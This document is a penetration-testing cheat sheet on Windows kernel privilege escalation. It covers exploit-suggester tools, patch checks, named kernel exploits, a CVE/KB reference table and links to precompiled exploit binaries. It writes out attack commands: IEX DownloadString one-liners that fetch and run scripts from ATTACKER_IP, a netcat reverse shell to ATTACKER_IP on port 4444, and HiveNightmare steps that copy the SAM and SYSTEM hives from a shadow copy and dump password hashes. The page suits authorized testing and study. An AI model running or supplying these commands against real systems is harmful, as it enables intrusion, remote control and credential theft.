Kernel Exploits

Methodology

systeminfo → compare patches → find missing KB → search exploit → compile/download → execute

Windows Exploit Suggester

wesng (Recommended)

git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update

Save systeminfo output from victim:

systeminfo > systeminfo.txt

Run:

python3 wes.py systeminfo.txt

Filter critical only:

python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

Watson (.NET — Run on Target)

Watson.exe

Identifies missing KBs and suggests exploits. Requires .NET 4.5+.

Sherlock (PowerShell — Deprecated but Works)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Sherlock.ps1'); Find-AllVulns

Check Installed Patches

wmic qfe

Get-HotFix | Sort-Object InstalledOn -Descending

Compare against known exploit KBs.

Common Kernel Exploits

MS16-032 — Secondary Logon (Windows 7/8/10, Server 2008/2012)

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/MS16-032.ps1'); Invoke-MS16032

Missing KB: KB3139914

MS15-051 — Win32k (Windows 7, Server 2008)

ms15-051.exe whoami
ms15-051.exe "cmd /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

Missing KB: KB3045171

MS14-058 — TrackPopupMenu (Windows 7, Server 2008)

ms14-058.exe

Missing KB: KB3000061

CVE-2021-1675 / CVE-2021-34527 — PrintNightmare

See dedicated PrintNightmare page.

CVE-2021-36934 — HiveNightmare / SeriousSAM

SAM/SYSTEM readable by non-admin due to shadow copy ACL. Check:

icacls C:\Windows\System32\config\SAM

If BUILTIN\Users has read access:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .

Extract:

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

CVE-2023-28252 — CLFS Driver

Windows 10/11, Server 2022. CLFS kernel driver elevation.

# Check
https://github.com/fortra/CVE-2023-28252

Pre-compiled Exploits

# SecWiki collection
https://github.com/SecWiki/windows-kernel-exploits

# Precompiled binaries
https://github.com/abatchy17/WindowsExploits

Quick Reference

CVE	KB	Affected	Year
MS08-067	KB958644	XP, Server 2003	2008
MS14-058	KB3000061	7, Server 2008	2014
MS15-051	KB3045171	7, Server 2008	2015
MS16-032	KB3139914	7/8/10, Server 2008/2012	2016
CVE-2021-1675	KB5003690	10/11, Server 2016-2022	2021
CVE-2021-36934	KB5004945	10 (1809+)	2021
CVE-2023-28252	KB5025221	10/11, Server 2022	2023

Documentation Index

​Methodology

​Windows Exploit Suggester

​wesng (Recommended)

​Watson (.NET — Run on Target)

​Sherlock (PowerShell — Deprecated but Works)

​Check Installed Patches

​Common Kernel Exploits

​MS16-032 — Secondary Logon (Windows 7/8/10, Server 2008/2012)

​MS15-051 — Win32k (Windows 7, Server 2008)

​MS14-058 — TrackPopupMenu (Windows 7, Server 2008)

​CVE-2021-1675 / CVE-2021-34527 — PrintNightmare

​CVE-2021-36934 — HiveNightmare / SeriousSAM

​CVE-2023-28252 — CLFS Driver

​Pre-compiled Exploits

​Quick Reference